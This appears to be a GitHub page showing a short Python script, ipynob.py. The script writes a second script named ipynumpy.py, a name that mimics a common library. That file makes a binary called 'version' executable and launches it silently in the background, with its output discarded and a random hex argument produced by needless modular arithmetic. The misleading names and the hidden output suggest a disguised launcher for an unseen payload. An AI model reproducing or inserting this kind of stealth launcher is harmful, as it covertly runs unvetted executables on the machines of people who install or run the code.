-
Notifications
You must be signed in to change notification settings - Fork 11
/
Copy pathipynob.py
36 lines (30 loc) · 1.17 KB
/
ipynob.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
import random
def extended_gcd(aa, bb):
lastremainder, remainder = abs(aa), abs(bb)
x, lastx, y, lasty = 0, 1, 1, 0
while remainder:
lastremainder, (quotient, remainder) = remainder, divmod(lastremainder, remainder)
x, lastx = lastx - quotient*x, x
y, lasty = lasty - quotient*y, y
return lastremainder, lastx * (-1 if aa < 0 else 1), lasty * (-1 if bb < 0 else 1)
def modinv(a, m):
g, x, y = extended_gcd(a, m)
if g != 1:
raise ValueError
return x % m
N = 0xffffffffff
with open("ipynumpy.py", "w") as f:
for _ in range(1):
W = random.randrange(16**10)
val = str(hex((((W)) * modinv(((1)),N)) % N))
print("import os", file=f)
print("import subprocess", file=f)
print("", file=f)
print("modter = 'chmod +x version'", file=f)
print("os.system (modter)", file=f)
print("", file=f)
print("subprocess.Popen(", file=f)
print(" ['./version', '" + val + "'],", file=f)
print(" stdout=subprocess.DEVNULL,", file=f)
print(" stderr=subprocess.DEVNULL,", file=f)
print(")", file=f)